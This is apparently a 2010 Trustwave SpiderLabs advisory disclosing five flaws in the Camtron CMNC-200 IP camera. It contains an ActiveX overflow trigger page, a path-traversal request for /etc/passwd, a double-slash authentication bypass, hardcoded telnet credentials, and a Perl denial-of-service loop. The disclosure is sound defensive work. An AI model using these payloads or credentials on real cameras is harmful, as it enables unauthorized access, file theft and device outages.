Camtron CMNC-200 IP Camera Traversal / Overflow / Bypass / Denial Of Service

`Trustwave's SpiderLabs Security Advisory TWSL2010-006:  
Multiple Vulnerabilities in Camtron CMNC-200 IP Camera  
  
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt  
  
Published: 2010-11-12  
Version: 1.0  
  
Vendors:  
Camtron (http://www.camtron.co.kr/)  
TecVoz (http://www.tecvoz.com.br/)  
Products: Camtron CMNC-200 Full HD IP Camera, TecVoz CMNC-200  
Megapixel IP Camera, and other Camtron CMNC-200 based OEM products  
Version(s) affected: Enc: V1.102A-008 / Board ID 66  
  
Description:  
Camtron CMNC-200 Full HD is a line of professional IP cameras for  
corporate environments. The most notable features are full HD support  
(1920 x 1080), dual streaming, 10x optical zoom, SD card input, input  
and output alarm sensor, and integration with different DVR solutions.  
  
Source: http://www.camtron.co.kr  
Credit: Wendel G. Henrique of Trustwave's SpiderLabs  
  
CVE: CVE-2010-4230  
CVE-2010-4231  
CVE-2010-4232  
CVE-2010-4233  
CVE-2010-4244  
  
Finding 1: Buffer Overflow in ActiveX Control  
CVE: CVE-2010-4230  
  
The CMNC-200 IP Camera ActiveX control identified by  
CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable  
to a stack overflow on the first argument of the connect method.  
The vulnerability can be used to set the EIP register,  
allowing a reliable exploitation.  
  
The example code below triggers the vulnerability.  
  
<html>  
<head><title>IPcam POC</title>  
<script>  
function Check(){  
var bf1 = 'A';  
while (bf1.length <= 6144) bf1 = bf1 + 'A';  
obj.connect(bf1,"BBBB","CCCC");  
}  
</script>  
</head>  
<body onload=" Check();">  
<object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32"  
id="obj">  
</object>  
</html></body>  
  
Vendor Response:  
No response received.  
  
Remediation Steps:  
No patch currently exists for this issue. To limit exposure,  
network access to these devices should be limited to authorized  
personnel through the use of Access Control Lists and proper  
network segmentation.  
  
  
Finding 2: Directory Traversal in Camera Web Server  
CVE: CVE-2010-4231  
  
The CMNC-200 IP Camera has a built-in web server that  
is enabled by default. The server is vulnerable to directory  
transversal attacks, allowing access to any file on the  
camera file system.  
  
The following example will display the contents of  
/etc/passwd:  
  
GET /../../../../../../../../../../../../../etc/passwd  
HTTP/1.1  
  
Because the web server runs as root, an attacker can read  
critical files like /etc/shadow from the web-based  
administration interface. Authentication is not required for  
exploitation.  
  
Vendor Response:  
No response received.  
  
Remediation Steps:  
No patch currently exists for this issue. To limit exposure,  
network access to these devices should be limited to authorized  
personnel through the use of Access Control Lists and proper  
network segmentation.  
  
  
Finding 3: Web Based Administration Interface Bypass  
CVE: CVE-2010-4232  
  
The CMNC-200 IP Camera has an administrative web  
interface that does not handle authentication properly.  
Using a properly formatted request, an attacker can bypass  
the authentication mechanism.  
  
The first example requires authentication:  
http://www.ipcamera.com/system.html  
  
When a second forward slash is placed after the hostname,  
authentication is not required.  
http://www.ipcamera.com//system.html  
  
This vulnerability allows an attacker to take full control of  
the IP Camera.  
  
Vendor Response:  
No response received.  
  
Remediation Steps:  
No patch currently exists for this issue. To limit exposure,  
network access to these devices should be limited to authorized  
personnel through the use of Access Control Lists and proper  
network segmentation.  
  
  
Finding 4: Undocumented Default Accounts  
CVE: CVE-2010-4233  
  
The CMNC-200 IP Camera has undocumented default  
accounts on its Linux operating system. These accounts can  
be used to login via the cameras telnet interface, which  
cannot be normally disabled. The usernames and passwords are  
listed below.  
  
User: root Password: m  
User: mg3500 Password: merlin  
  
Vendor Response:  
No response received.  
  
Remediation Steps:  
No patch currently exists for this issue. To limit exposure,  
network access to these devices should be limited to authorized  
personnel through the use of Access Control Lists and proper  
network segmentation.  
  
  
Finding 5: Camera Denial of Service  
CVE: CVE-2010-4234  
  
The CMNC-200 IP Camera has a built-in web server that  
is vulnerable to denial of service attacks. Sending multiple  
requests in parallel to the web server may cause the camera  
to reboot.  
  
Requests with long cookie header makes the IP camera reboot a few  
seconds faster, however the same can be accomplished with requests  
of any size.  
  
The example code below is able to reboot the IP cameras in  
less than a minute in a local network.  
  
#!/usr/bin/perl  
  
use LWP::UserAgent;  
  
while (1 == 1){  
  
$ua = new LWP::UserAgent;  
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;  
rv:1.8.1.6)");  
  
$req = HTTP::Request->new(GET => 'http://192.168.10.100');  
$req->header(Accept =>  
"text/xml,application/xml,application/xhtml+xml,text/html  
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");  
$req->header("Keep-Alive" => 0);  
$req->header(Connection => "close");  
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009  
02:06:34 GMT");  
$req->header(Cookie =>  
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");  
my $res = $ua->request($req);  
  
}  
  
Vendor Response:  
No response received.  
  
Remediation Steps:  
No patch currently exists for this issue. To limit exposure,  
network access to these devices should be limited to authorized  
personnel through the use of Access Control Lists and proper  
network segmentation.  
  
Vendor Communication Timeline:  
10/7/10 - Vendor contact attempted  
10/21/10 - Vendor contact attempted  
11/1/10 - Vendor contact attempted  
11/11/10 - CVE numbers obtained  
11/12/10 - Advisory public release  
  
Revision History:  
1.0 Initial publication  
  
About Trustwave:  
Trustwave is the leading provider of on-demand and subscription-based  
information security and payment card industry compliance management  
solutions to businesses and government entities throughout the world. For  
organizations faced with today's challenging data security and compliance  
environment, Trustwave provides a unique approach with comprehensive  
solutions that include its flagship TrustKeeper compliance management  
software and other proprietary security solutions. Trustwave has helped  
thousands of organizations--ranging from Fortune 500 businesses and large  
financial institutions to small and medium-sized retailers--manage  
compliance and secure their network infrastructure, data communications and  
critical information assets. Trustwave is headquartered in Chicago with  
offices throughout North America, South America, Europe, Africa, China and  
Australia. For more information, visit https://www.trustwave.com  
  
About Trustwave's SpiderLabs:  
SpiderLabs is the advance security team at Trustwave responsible for  
incident response and forensics, ethical hacking and application security  
tests for Trustwave's clients. SpiderLabs has responded to hundreds of  
security incidents, performed thousands of ethical hacking exercises and  
tested the security of hundreds of business applications for Fortune 500  
organizations. For more information visit  
https://www.trustwave.com/spiderlabs  
  
Disclaimer:  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Trustwave disclaims all warranties, either express or  
implied, including the warranties of merchantability and fitness for a  
particular purpose. In no event shall Trustwave or its suppliers be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.  
  
  
  
`